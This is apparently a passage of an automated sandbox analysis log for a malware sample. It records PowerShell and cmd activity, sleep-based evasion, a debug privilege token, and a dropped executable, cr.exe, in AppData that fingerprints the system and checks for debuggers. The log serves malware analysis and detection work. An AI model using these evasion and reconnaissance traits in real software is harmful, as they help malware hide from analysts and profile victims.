      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045F42D FindFirstFileExW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CF67D FindFirstFileExW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004365E1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: powershell.exe, 0000000E.00000002.2143327246.000000000035B000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044663D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459A7D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459A39 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459AAE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00220083 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B688D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9C89 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9CFE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9CCD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00270D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00409290 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FFB9 SetUnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044017B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
